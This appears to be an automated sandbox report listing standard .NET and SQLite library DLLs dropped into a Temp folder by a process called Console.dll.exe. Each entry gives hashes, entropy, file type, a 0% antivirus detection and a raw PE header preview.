                                                                                                                                                                                                                        SHA-512:0F757D5302A128FEE9EE08D09947E4699D88B54631429A4F5501D8424FF1DEF1C5ACDBB977B72768C52F585116C1828450C11977B53E32BE7B347F6158B15BC5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....l..........." ..0..p............... ........... ..............................q.....`.................................l...O....................|..8(..............T............................................ ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............z..............@..B........................H.......................z.. ...........................................F.o-...-..*.(....*2.(/...%-.&.*..0............(....*.0..(........(0...Q~.....P..o1...-..........*.s2...*.s3...%r...p.o4...%r...p.o4...%r-..p.o4...%rA..p.o4........*.0../........o.......o5....o)....o.....o6.......,..o......*..........#......:...(.........*..0../........o.......o5....o)....o.....o7.......,..o......*..........#......N..rW..p......(....*.0...........(8....-..+..o9.........,.(....s:...z.-.ra..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.Core.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1177760
                                                                                                                                                                                                                        Entropy (8bit):6.848480046631327
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:HLxNvX/3i1TKACt5LKGpxReFLO6Rf3iqQYR72pBeBKr:H3vXoTKACt1KGpC3iVOAe8r
                                                                                                                                                                                                                        MD5:33050B443062122F010194B73BD8AF00
                                                                                                                                                                                                                        SHA1:956DB0F1059258101379C6F2E2FD037F1AEADDE0
                                                                                                                                                                                                                        SHA-256:D9391AEE008001F86BAB5D7DA33FEFF97344F24026E3FBBAF1BF3403E9E96F50
                                                                                                                                                                                                                        SHA-512:4FBCE6314F70EBE621D84C589CEA1E4F1974B79DB36C5324A45FAF5748712D5C4C422544241F6D6310156B9BFFE54301D453C4D8E8FDD2738E84E5D3F782FFA5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.............!.........@....................@.................................'.....@......................................................2.......(... ..$....>..p...............................................................H............text...hw.......................... ..`.data...............................@....reloc..$.... ....... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17584
                                                                                                                                                                                                                        Entropy (8bit):6.595363896972929
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:dku3cAuFxWmHw9QdWib5kHRN7ZuctHNsAR9zdJaBMs:WuMAucxbts89zHS
                                                                                                                                                                                                                        MD5:BA644F992F56E965FFDF1557CFCC7F6D
                                                                                                                                                                                                                        SHA1:CF95259A72666BFE2A6C5657116DF20D1024EE41
                                                                                                                                                                                                                        SHA-256:BEC43734B851521336FB1B105368E6EEDA22ACC2124A39530D1433B26E259BAF
                                                                                                                                                                                                                        SHA-512:AFD20791B634B89DD747DCC19A17D00DB28DE55C498F541409554A0455AE00C4DE08ED0538BAF98DD3FD5324BD5CB9EBA67753C30D2BAF7750E65DCFF761C6A9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............B1... ...@....... ...............................Z....`..................................0..O....@...................(...`.......0..T............................................ ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................#1......H.......P ..4..................../......................................BSJB............v4.0.30319......l.......#~..,...t...#Strings............#US.........#GUID...........#Blob......................3................................K.....C.................................J.....~...........b...........G...........c.....................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.Primitives.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15536
                                                                                                                                                                                                                        Entropy (8bit):6.816097016728845
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:ri2GeWhQpWiI5kHRN7JldBmo8R9zCBUnfu6:rei3JhmoQ9zzfu6
                                                                                                                                                                                                                        MD5:95E00F4E8FC22C3447F7D26491A6A454
                                                                                                                                                                                                                        SHA1:ED6203DB937764A8557993D118B079DB275DE3D1
                                                                                                                                                                                                                        SHA-256:AF8033EC095475DF5EBB0F96F67032B5D07D8A2AC63422EE60472737D54FF7E0
                                                                                                                                                                                                                        SHA-512:FE00B6A06F18AB4AA68B4B6E87F22B1D070A4EE5F5457B39CE86083E9EC0FF45D01B95A247EC9EADCC2000C1C6D010E3F06AC88AFA079046D71A2D2309267CFF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............)... ........@.. ...............................2....`..................................)..Z....@...................(...`.......(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ......................................l.x..C...t.p.}R.Y.D./0...T_.....;...f.9k...?HaX..4(..o.r....e9.]...ak....r.t..f....G..:}/.0.@..k...,.....n......u.-(.Mv.BSJB............v4.0.30319......`.......#~..(.......#Strings............#GUID... .......#Blob......................3................................................"...........;.l.........f.....!.E.....E.....>.................E...[.E.....E.....E.....E...B.E...O.E...v.............

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.Registry.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):104624
                                                                                                                                                                                                                        Entropy (8bit):6.239107531503012
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:txJ4wrxiBj+FQeqJSvEVcULVisIiqELYJD8Tf/pY:xriB+FrqJSvEVzoVCYopY
                                                                                                                                                                                                                        MD5:58A02530C07FF07AE2807187734B9079
                                                                                                                                                                                                                        SHA1:4DEA1F3CE455D5D2765B44D9DDE02410CD279706
                                                                                                                                                                                                                        SHA-256:E474A0D30B5186E42E4DBB08D0AD25AC523D322345A4470CAE7FB9252A7F0D4E
                                                                                                                                                                                                                        SHA-512:6CA211DC5D68BA3BA3C6543E3AEB877C876A28F432572F49462813D99645C78A65972C81F37434AB827E4AFFFE384460B8D6BB7F3DB46DA7793C973F10E73516
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s............!.....0...0...............@....@..........................p............@.................................................<$.......p...(...`..<.......p...............................................................H............text....'.......0.................. ..`.data...$....@... ...@..............@....reloc..<....`.......`..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.SystemEvents.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50248
                                                                                                                                                                                                                        Entropy (8bit):6.289462537946871
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:zSXwygO6T53MF09ipSJkKFZGf9PTIG57raN8q8j76P5:zS596T53MoipSlZsVTIMvaN8Hj76P5
                                                                                                                                                                                                                        MD5:EF50BD977976ED929FABEAF6C9241C45
                                                                                                                                                                                                                        SHA1:AD004278F0C66CF0086C1024CE46B04852DE6ECA
                                                                                                                                                                                                                        SHA-256:1D5BBFB227F20E866CF25F649A059B61C3F35336F69EBD19B8EDE7B6E14A7414
                                                                                                                                                                                                                        SHA-512:5ED13DEBF26F120C80C09DF572571B3BB05FCABEE7B1C7D945D2D767B13A2FE1C5861CAD4FA1FEA1658357FB025F9237F7AE2DE510DB120CFF6EF4041D5F6707
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6)q..........." ..0.............:.... ........... ...............................X....`....................................O.......................H$.............T............................................ ............... ..H............text...@.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........;..pt..................d.........................................*..0..1.......(....,..%-.&.*..(.....o.......&...,...o....,..*.*....................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%....(....*......( ...

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Newtonsoft.Json.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):712464
                                                                                                                                                                                                                        Entropy (8bit):5.960816598800232
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:mFIM0KteTMN4Or4D3OdmZg5WHEaEDIGBBjgrIQtD+tVqDMW:6zMTMNNd+g5Wk78GBBjgrIQtDF
                                                                                                                                                                                                                        MD5:ADF3E3EECDE20B7C9661E9C47106A14A
                                                                                                                                                                                                                        SHA1:F3130F7FD4B414B5AEC04EB87ED800EB84DD2154
                                                                                                                                                                                                                        SHA-256:22C649F75FCE5BE7C7CCDA8880473B634EF69ECF33F5D1AB8AD892CAF47D5A07
                                                                                                                                                                                                                        SHA-512:6A644BFD4544950ED2D39190393B716C8314F551488380EC8BD35B5062AA143342DFD145E92E3B6B81E80285CAC108D201B6BBD160CB768DC002C49F4C603C0B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)..........." ..0.............>.... ........... ....................... .......m....`.....................................O......................../..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............9............................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*.(.........*....}.....(......{.....X.....}....*....0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..o....aX...X...o....2.....cY.....cY....cY..{......{...._..+&.{|..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SQLite.Interop.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1592504
                                                                                                                                                                                                                        Entropy (8bit):6.822600212908256
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:m99D5xnu3JyrgBD+0AcwN12xVRz2JG4k7P4IYvbb8PBSB6LHLcZ4TB4v81R1k:mf5xnu3+g3wWPYkPk4HLDv1R1k
                                                                                                                                                                                                                        MD5:9CA5B1D02E334FFED34D80AE2B02490F
                                                                                                                                                                                                                        SHA1:84015D25373E1CA3A17E85FFFEF2BF1738BD172C
                                                                                                                                                                                                                        SHA-256:553693B15BDA4BBF7788BEE09B8BD325FFE4DB151686F432194C58E15B9B4F1E
                                                                                                                                                                                                                        SHA-512:B66BBA909C8EBBD3AAC071AD0599C952C27503D5414EBAF3CAE7D7A40ECA6CDC83B1DD438E4E9E72985FF96E4F3C1D54E9DBF1109AC0B74D2777A73C441507FB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ao...............5.7....7.....6."...>P......>P......>P........n..............\W............P......P......P;.....P......Rich....................PE..L....Q.f...........!.....6...................P...............................P......gH....@.........................P.......@&..x........................T..............p...............................@............P..L............................text....5.......6.................. ..`.rdata..d....P.......:..............@..@.data... F...@...2..................@....gfids...............P..............@..@.rsrc................R..............@..@.reloc...............\..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SQLitePCLRaw.core.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50688
                                                                                                                                                                                                                        Entropy (8bit):5.811409220314285
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:jmOGveifSTtyXEQ3nPGLb4PFvSMJCD2j+SIfHq1wJd9P581IADm/Dskqd:FLTtyXEQ3+bO6U+dlrPi14LsX
                                                                                                                                                                                                                        MD5:E4823410682299E5A17619043C789EFB
                                                                                                                                                                                                                        SHA1:410D31CA04AF5264F265DF10DE499416225A0962
                                                                                                                                                                                                                        SHA-256:C33995427EDD44FA641CF702DF8B63CC82CB7054DD984DC8277D15EE7C958874
                                                                                                                                                                                                                        SHA-512:5DDF9C356CB813BCA2097184CB16172A6B3D70CFB17CD11216CD1268550C2C897BC0C42A6675720E334EBF150EBB3725185380BB5822D9B4D953B00EC0B21583
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,b............" ..0.................. ........... ....................... ............`.....................................O.......0...............................T............................................ ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................H.......@@..<...........|.................................................(....*..(....*..(....*.......*Z~....,.*.oB...&......*.......*b~....-.r...ps....z~....*.(#...o8...*.0..........(#......o9.....(....Q*6.(.....(%...*.0..........(#........o:.....(....Q*R.(.......(....('...*:(#......o?...*N.(.....(.....()...*2(#....o;...*2(#....o<...*..o....*..o....*2(#....o=...*2(#....o>...*6(#.....o....*...0..........s"......}"....{"...-...+....#...s.......(1...*6(#.....o....*6..(....(3..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SuperSocket.ClientEngine.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):49664
                                                                                                                                                                                                                        Entropy (8bit):5.624355880348956
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:tBoN0qD58Tbkn9DSZyBQAESH3S/aCGcjjJToUSrqvSKLAPs/yOrQV59L:tBvwFg/25sjVToDCAE/yOwP
                                                                                                                                                                                                                        MD5:D0B4C02720D3EAF223665C31F3A5980D
                                                                                                                                                                                                                        SHA1:E92DBCB6EA2DB9C745E0E566CFB001BBA026129C
                                                                                                                                                                                                                        SHA-256:B741FBEFC8576F305DF244918FA3D3BB167353B3FC44A2CB666EE5208AB95327
                                                                                                                                                                                                                        SHA-512:61CB24A6D86B491B7ACE554F3FCB33C20E308642540669EA04F271DE1B5B45BFE51F730D8D02013F71CFE3ED571581AD319DE9D470900ACAE7EBC833FFE09912
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Y..........." ..0.................. ........... ....................... ............@.....................................O.......................................8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........[..Hy..................`........................................0..#............. .....D...%.C...(.........s....%..o....%..o....%..o....%..o....%..o....%..o....%..o....%..o....%..o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%....o....%. . o....%.!.!o....%."."o....%.#.#o....%.$.$o....%.%.%o.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.AppContext.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15648
                                                                                                                                                                                                                        Entropy (8bit):6.753797489189962
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:gkKweBWn7Wirs5kHRN7kBXkXC4deR9zZjmN5r23o:gkKtubpkVkXC4dC9zZjyc3o
                                                                                                                                                                                                                        MD5:D111AFAA34757237FD34F9B26A5D8181
                                                                                                                                                                                                                        SHA1:4526342F888E03A9118AD9311CCB07EBDB0F9030
                                                                                                                                                                                                                        SHA-256:027F3ACFE644BD507DCDDD8C7C176A78CB9559E13E5BE50D5470FA2174DA84D8
                                                                                                                                                                                                                        SHA-512:D8EA82B5F821BD8EA75327CE6E0E52D2673DDA1AAC6870977E5E1227AD40DCADCA75B0AA03C3249171F53DDD57AC31B57791A321DECB7BFB21DA8204B6D83941
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............(... ...@....... ..............................`.....`..................................(..O....@..d............... )...`.......'..T............................................ ............... ..H............text........ ...................... ..`.rsrc...d....@......................@..@.reloc.......`......................@..B.................(......H.......P ......................('......................................BSJB............v4.0.30319......l.......#~......<...#Strings....H.......#US.L.......#GUID...\...|...#Blob......................3......................................................x.....3...........^.................I....._.................w.................G...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Buffers.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                        Entropy (8bit):6.728255935278265
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:v8lEugW+2WiTuWXebPpUNTQHnhWgN7aIWdryVvKIjwX01k9z3ADZ7A:vC2W+2WiTTb2HRN7urdHR9zkZk
                                                                                                                                                                                                                        MD5:B05DD0701285D796F30FCDA38CF3B39B
                                                                                                                                                                                                                        SHA1:E97247AABCACCAE4D8CC565318335FBC6124DCA5
                                                                                                                                                                                                                        SHA-256:596E5E2095C5697FC837A2617EE9338B066CD04EF7DEE39C0AFDF6A8AF1EC63B
                                                                                                                                                                                                                        SHA-512:1D1AC14FA8E09BAB7691DDE40AC11B2E6586D60703477A6FAD4F6FD46281FB4ABA6A540B3E57A54CF91683A4D38F335711D169CEF17FD3BC0CB5589E693324C7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+............." ..0..............(... ...@....... .............................. $....`..................................(..O....@..T................(...`.......'..T............................................ ............... ..H............text........ ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................(......H.......P ......................('......................................BSJB............v4.0.30319......l.......#~......@...#Strings....L.......#US.P.......#GUID...`...x...#Blob......................3............................................................?.....!.....j.....%...........U.....k.....:.......................!.....S...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.CodeDom.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):181832
                                                                                                                                                                                                                        Entropy (8bit):5.917625939763569
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:mY2yqUA/5kOGHiqtoYFWor6ElxbEaY/H+pHWh1wd:mn2se6FV/m2a
                                                                                                                                                                                                                        MD5:C8D066C4FDDCFF1A01F44067820CCF9D
                                                                                                                                                                                                                        SHA1:063CE3FDA5D29B9981133DB0853A4D565D390E86
                                                                                                                                                                                                                        SHA-256:1704E5890D0365D8EC336A4685B049F3E375D52FD1B939FCAF701C06949A59F2
                                                                                                                                                                                                                        SHA-512:4D7776C6821A7CC9B4C9ADC3D216B3BC0A0B8FEDCC0979EC715E31632B2CBEAA7C7E9E899D71283A23CA35CB503938E7BC8D6715FA559076A4227C660593DB64
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]............." ..0.................. ........... ....................................`.................................f...O.......d...............H$..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...d...........................@..@.reloc..............................@..B........................H........U...S..........D................................................0..Z..............%...K...%.r...p.%.r...p.%.r...p.%.r...p.%.r...p..%...K...%.r...p.%.r'..p.%.r/..p.%.r7..p.%.r?..p.%.rG..p..%....K...%.rO..p.%.rY..p.%.rc..p.%.rm..p.%.rw..p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.%..r...p.%..r...p.%..r...p.%..r...p.%..r...p..%....K...%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r!..p.%.r-..p.%.r9..p.%.rE..p.%..rQ..p.%..r]..p.%..ri..p.%..ru..p.%..r...p.%..r...p.%..r...p..%.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Concurrent.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):252064
                                                                                                                                                                                                                        Entropy (8bit):6.7749264410043875
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:cJHdsQa+HDpMp4s+G0Fe4ELhyO2SZyKqq3:cB6tuwhD2el
                                                                                                                                                                                                                        MD5:AA8C242196BB3DA74C488906F80B2622
                                                                                                                                                                                                                        SHA1:EF70921FF2B5B950C0DA80DADD82DC054A43071B
                                                                                                                                                                                                                        SHA-256:509A76033EC39C4BCAE0CB64449D03CF00AE54B5F563EF4B2EA556A328FB1E53
                                                                                                                                                                                                                        SHA-512:FEE9DA2E47429D7083E0097ADEFA15896CA8C33EFE5D54E54AE6FDF819C3235EFCF837845DB55234DFACBA6D4B8FB6A009A7E1ACCF288269FF0396AA06ACD0C9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-..............!.....@...`...............P....@.................................7w....@..................................................L...........(..............p...............................................................H............text....1.......@.................. ..`.data....1...P...@...P..............@....reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Immutable.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):751792
                                                                                                                                                                                                                        Entropy (8bit):6.856824538304033
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:sWEcFsnQNCNn5vQXyVKlqhmnQHYOa5Nwtzc0T9YLVgHjJ4vZ9D89BXPrCZN3:hIn5vQXyVKlqWQHYOa5NwRmMjiZ9o9Va
                                                                                                                                                                                                                        MD5:B02CE23285D5094545E3F0AFB554B932
                                                                                                                                                                                                                        SHA1:CDC200407CA127548D24B3F8BE6B02E107045AF9
                                                                                                                                                                                                                        SHA-256:B85EDE92EC4F322A4AC56F21C504F4CEC5DCF1F89C4357685FB35057C01371CB
                                                                                                                                                                                                                        SHA-512:AB549273136A560A2F80BC6B23DEE83C873CD10E795FD45A160B72EF0916D11D9CDBAA4FB839682B6CCAA7C25955B9CCE79E9C38504E3D03025BCBCC16C854BD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.g............!.........`....................@..........................P............@.................................................@....I...P...(......|k.. ..p...............................................................H............text............................... ..`.data...............................@....reloc..|k.......p..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.NonGeneric.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):92320
                                                                                                                                                                                                                        Entropy (8bit):6.138398130647138
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:ef2FS9++L8M+i7VrMZmnEWPqMb6ZBKoaicz1:eOM+C8M+wGZCE5vJeB
                                                                                                                                                                                                                        MD5:A87F219CE4F88E51E10B344CB288E315
                                                                                                                                                                                                                        SHA1:AF4D7CBBCA686FE7FF8A61FE32149E29793EBDCC
                                                                                                                                                                                                                        SHA-256:1F22A74D24B9494E06C3F05C8CAF0DEB588E67D784E6956D65E8AE2E2BAC8C11
                                                                                                                                                                                                                        SHA-512:E9F4F38D589A2B3CD422D126CDADAF6F5DD0790CF5B801A6E75006A55A1849963B86E426910719BC084675280E0E01E5228E7EAFA864AF910AFCC35187F196C7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
